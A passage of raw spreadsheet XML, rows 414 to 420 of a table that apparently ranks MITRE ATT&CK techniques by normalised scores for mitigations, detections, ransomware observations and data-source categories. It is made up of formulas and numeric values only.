      <c r="AQ414" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>197.96182661904763</v>
      </c>
      <c r="AR414" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS414" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT414" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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15" spans="1:47" ht="34">
      <c r="A415" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B415" s="37">
        <f t="shared" si="6"/>
        <v>258.50007833333331</v>
      </c>
      <c r="C415" s="37" t="s">
        <v>1458</v>
      </c>
      <c r="D415" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E415" s="37" t="s">
        <v>1459</v>
      </c>
      <c r="F415" s="37">
        <v>1</v>
      </c>
      <c r="G415" s="37">
        <v>1</v>
      </c>
      <c r="H415" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I415" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J415" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K415" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L415" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M415" s="37">
        <v>0</v>
      </c>
      <c r="N415" s="56">
        <v>0</v>
      </c>
      <c r="O415" s="56">
        <v>0</v>
      </c>
      <c r="P415" s="56">
        <v>0</v>
      </c>
      <c r="Q415" s="56">
        <v>0</v>
      </c>
      <c r="R415" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S415" s="57">
        <v>3</v>
      </c>
      <c r="T415" s="57" t="s">
        <v>584</v>
      </c>
      <c r="U415" s="57">
        <v>3</v>
      </c>
      <c r="V415" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>5.7142904761904763E-2</v>
      </c>
      <c r="W415" s="37">
        <v>6</v>
      </c>
      <c r="X415" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y415" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z415" s="37">
        <v>0</v>
      </c>
      <c r="AA415" s="37">
        <v>0</v>
      </c>
      <c r="AB415" s="37">
        <v>0</v>
      </c>
      <c r="AC415" s="37"/>
      <c r="AD415" s="50" t="s">
        <v>1460</v>
      </c>
      <c r="AE415" s="37" t="str" cm="1">
        <f t="array" ref="AE415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD415)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF415" s="37">
        <v>411</v>
      </c>
      <c r="AG415" s="37" t="str" cm="1">
        <f t="array" ref="AG415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH415" s="37">
        <v>411</v>
      </c>
      <c r="AI415" s="37" t="str" cm="1">
        <f t="array" ref="AI415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD415)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ415" s="37">
        <v>411</v>
      </c>
      <c r="AK415" s="37" t="str" cm="1">
        <f t="array" ref="AK415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL415" s="37">
        <v>411</v>
      </c>
      <c r="AM415" s="37" t="str" cm="1">
        <f t="array" ref="AM415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN415" s="37">
        <v>0</v>
      </c>
      <c r="AO415" s="37">
        <v>0</v>
      </c>
      <c r="AP415" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ415" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>86.166692777777769</v>
      </c>
      <c r="AR415" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS415" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT415" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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16" spans="1:47" ht="34">
      <c r="A416" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B416" s="37">
        <f t="shared" si="6"/>
        <v>494.69984295238095</v>
      </c>
      <c r="C416" s="37" t="s">
        <v>1461</v>
      </c>
      <c r="D416" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E416" s="37" t="s">
        <v>1462</v>
      </c>
      <c r="F416" s="37">
        <v>1</v>
      </c>
      <c r="G416" s="37">
        <v>1</v>
      </c>
      <c r="H416" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I416" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J416" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K416" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L416" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M416" s="37">
        <v>0</v>
      </c>
      <c r="N416" s="56">
        <v>0</v>
      </c>
      <c r="O416" s="56">
        <v>0</v>
      </c>
      <c r="P416" s="56">
        <v>0</v>
      </c>
      <c r="Q416" s="56">
        <v>0</v>
      </c>
      <c r="R416" s="57" t="s">
        <v>1463</v>
      </c>
      <c r="S416" s="57">
        <v>9</v>
      </c>
      <c r="T416" s="57" t="s">
        <v>1464</v>
      </c>
      <c r="U416" s="57">
        <v>12</v>
      </c>
      <c r="V416" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999990476190477</v>
      </c>
      <c r="W416" s="37">
        <v>21</v>
      </c>
      <c r="X416" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y416" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z416" s="37">
        <v>0</v>
      </c>
      <c r="AA416" s="37">
        <v>0</v>
      </c>
      <c r="AB416" s="37">
        <v>0</v>
      </c>
      <c r="AC416" s="37"/>
      <c r="AD416" s="50" t="s">
        <v>1465</v>
      </c>
      <c r="AE416" s="37" t="str" cm="1">
        <f t="array" ref="AE416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF416" s="37">
        <v>412</v>
      </c>
      <c r="AG416" s="37" t="str" cm="1">
        <f t="array" ref="AG416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH416" s="37">
        <v>412</v>
      </c>
      <c r="AI416" s="37" t="str" cm="1">
        <f t="array" ref="AI416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD416)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ416" s="37">
        <v>412</v>
      </c>
      <c r="AK416" s="37" t="str" cm="1">
        <f t="array" ref="AK416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL416" s="37">
        <v>412</v>
      </c>
      <c r="AM416" s="37" t="str" cm="1">
        <f t="array" ref="AM416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN416" s="37">
        <v>0</v>
      </c>
      <c r="AO416" s="37">
        <v>0</v>
      </c>
      <c r="AP416" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ416" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>164.89994765079365</v>
      </c>
      <c r="AR416" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS416" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT416" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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17" spans="1:47" ht="34">
      <c r="A417" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B417" s="37">
        <f t="shared" si="6"/>
        <v>543.12888628571432</v>
      </c>
      <c r="C417" s="37" t="s">
        <v>1466</v>
      </c>
      <c r="D417" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E417" s="37" t="s">
        <v>1467</v>
      </c>
      <c r="F417" s="37">
        <v>1</v>
      </c>
      <c r="G417" s="37">
        <v>1</v>
      </c>
      <c r="H417" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I417" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J417" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K417" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L417" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M417" s="37">
        <v>0</v>
      </c>
      <c r="N417" s="56">
        <v>0</v>
      </c>
      <c r="O417" s="56">
        <v>0</v>
      </c>
      <c r="P417" s="56">
        <v>0</v>
      </c>
      <c r="Q417" s="56">
        <v>0</v>
      </c>
      <c r="R417" s="57" t="s">
        <v>1468</v>
      </c>
      <c r="S417" s="57">
        <v>11</v>
      </c>
      <c r="T417" s="57" t="s">
        <v>1469</v>
      </c>
      <c r="U417" s="57">
        <v>13</v>
      </c>
      <c r="V417" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22857161904761905</v>
      </c>
      <c r="W417" s="37">
        <v>24</v>
      </c>
      <c r="X417" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Y417" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Z417" s="37">
        <v>0</v>
      </c>
      <c r="AA417" s="37">
        <v>0</v>
      </c>
      <c r="AB417" s="37">
        <v>0</v>
      </c>
      <c r="AC417" s="37"/>
      <c r="AD417" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE417" s="37" t="str" cm="1">
        <f t="array" ref="AE417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD417)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF417" s="37">
        <v>413</v>
      </c>
      <c r="AG417" s="37" t="str" cm="1">
        <f t="array" ref="AG417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD417)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH417" s="37">
        <v>413</v>
      </c>
      <c r="AI417" s="37" t="str" cm="1">
        <f t="array" ref="AI417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD417)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ417" s="37">
        <v>413</v>
      </c>
      <c r="AK417" s="37" t="str" cm="1">
        <f t="array" ref="AK417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD417)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL417" s="37">
        <v>413</v>
      </c>
      <c r="AM417" s="37" t="str" cm="1">
        <f t="array" ref="AM417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD417)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN417" s="37">
        <v>0</v>
      </c>
      <c r="AO417" s="37">
        <v>1</v>
      </c>
      <c r="AP417" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ417" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>181.0429620952381</v>
      </c>
      <c r="AR417" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS417" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT417" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU41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4.334356240362812</v>
      </c>
    </row>
    <row r="418" spans="1:47" ht="51">
      <c r="A418" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B418" s="37">
        <f t="shared" si="6"/>
        <v>165.70000000000002</v>
      </c>
      <c r="C418" s="37" t="s">
        <v>1470</v>
      </c>
      <c r="D418" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E418" s="37" t="s">
        <v>1471</v>
      </c>
      <c r="F418" s="37">
        <v>1</v>
      </c>
      <c r="G418" s="37">
        <v>1</v>
      </c>
      <c r="H418" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I418" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J418" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K418" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L418" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M418" s="37">
        <v>0</v>
      </c>
      <c r="N418" s="56">
        <v>0</v>
      </c>
      <c r="O418" s="56">
        <v>0</v>
      </c>
      <c r="P418" s="56">
        <v>0</v>
      </c>
      <c r="Q418" s="56">
        <v>0</v>
      </c>
      <c r="R418" s="57"/>
      <c r="S418" s="57"/>
      <c r="T418" s="57"/>
      <c r="U418" s="57"/>
      <c r="V418" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W418" s="37">
        <v>0</v>
      </c>
      <c r="X418" s="37">
        <v>0</v>
      </c>
      <c r="Y418" s="37">
        <v>0</v>
      </c>
      <c r="Z418" s="37">
        <v>0</v>
      </c>
      <c r="AA418" s="37">
        <v>0</v>
      </c>
      <c r="AB418" s="37">
        <v>0</v>
      </c>
      <c r="AC418" s="37"/>
      <c r="AD418" s="50" t="s">
        <v>1472</v>
      </c>
      <c r="AE418" s="37" t="str" cm="1">
        <f t="array" ref="AE418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD418)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF418" s="37">
        <v>414</v>
      </c>
      <c r="AG418" s="37" t="str" cm="1">
        <f t="array" ref="AG418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD418)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH418" s="37">
        <v>414</v>
      </c>
      <c r="AI418" s="37" t="str" cm="1">
        <f t="array" ref="AI418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD418)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ418" s="37">
        <v>414</v>
      </c>
      <c r="AK418" s="37" t="str" cm="1">
        <f t="array" ref="AK418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD418)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL418" s="37">
        <v>414</v>
      </c>
      <c r="AM418" s="37" t="str" cm="1">
        <f t="array" ref="AM418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD418)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN418" s="37">
        <v>0</v>
      </c>
      <c r="AO418" s="37"/>
      <c r="AP418" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ418" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>55.233333333333341</v>
      </c>
      <c r="AR418" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS418" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT418" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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19" spans="1:47" ht="68">
      <c r="A419" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B419" s="37">
        <f t="shared" si="6"/>
        <v>166.10000000000002</v>
      </c>
      <c r="C419" s="37" t="s">
        <v>1473</v>
      </c>
      <c r="D419" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E419" s="37" t="s">
        <v>1474</v>
      </c>
      <c r="F419" s="37">
        <v>1</v>
      </c>
      <c r="G419" s="37">
        <v>1</v>
      </c>
      <c r="H419" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I419" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J419" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K419" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L419" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M419" s="37">
        <v>0</v>
      </c>
      <c r="N419" s="56">
        <v>0</v>
      </c>
      <c r="O419" s="56">
        <v>0</v>
      </c>
      <c r="P419" s="56">
        <v>0</v>
      </c>
      <c r="Q419" s="56">
        <v>0</v>
      </c>
      <c r="R419" s="57"/>
      <c r="S419" s="57"/>
      <c r="T419" s="57"/>
      <c r="U419" s="57"/>
      <c r="V419" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W419" s="37">
        <v>0</v>
      </c>
      <c r="X419" s="37">
        <v>0</v>
      </c>
      <c r="Y419" s="37">
        <v>0</v>
      </c>
      <c r="Z419" s="37">
        <v>0</v>
      </c>
      <c r="AA419" s="37">
        <v>0</v>
      </c>
      <c r="AB419" s="37">
        <v>0</v>
      </c>
      <c r="AC419" s="37"/>
      <c r="AD419" s="50" t="s">
        <v>1475</v>
      </c>
      <c r="AE419" s="37" t="str" cm="1">
        <f t="array" ref="AE419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD419)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF419" s="37">
        <v>415</v>
      </c>
      <c r="AG419" s="37" t="str" cm="1">
        <f t="array" ref="AG419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD419)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH419" s="37">
        <v>415</v>
      </c>
      <c r="AI419" s="37" t="str" cm="1">
        <f t="array" ref="AI419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD419)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ419" s="37">
        <v>415</v>
      </c>
      <c r="AK419" s="37" t="str" cm="1">
        <f t="array" ref="AK419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD419)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL419" s="37">
        <v>415</v>
      </c>
      <c r="AM419" s="37" t="str" cm="1">
        <f t="array" ref="AM419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD419)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN419" s="37">
        <v>0</v>
      </c>
      <c r="AO419" s="37"/>
      <c r="AP419" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ419" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>55.366666666666674</v>
      </c>
      <c r="AR419" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS419" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT419" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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20" spans="1:47" ht="51">
      <c r="A420" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B420" s="37">
        <f t="shared" si="6"/>
        <v>206.14285714285714</v>
      </c>
      <c r="C420" s="37" t="s">
        <v>1476</v>
      </c>
      <c r="D420" s="50" t="s">
        <v>1449</v>
      </c>
      <c r="E420" s="37" t="s">
        <v>1477</v>
      </c>
      <c r="F420" s="37">
        <v>1</v>
      </c>
      <c r="G420" s="37">
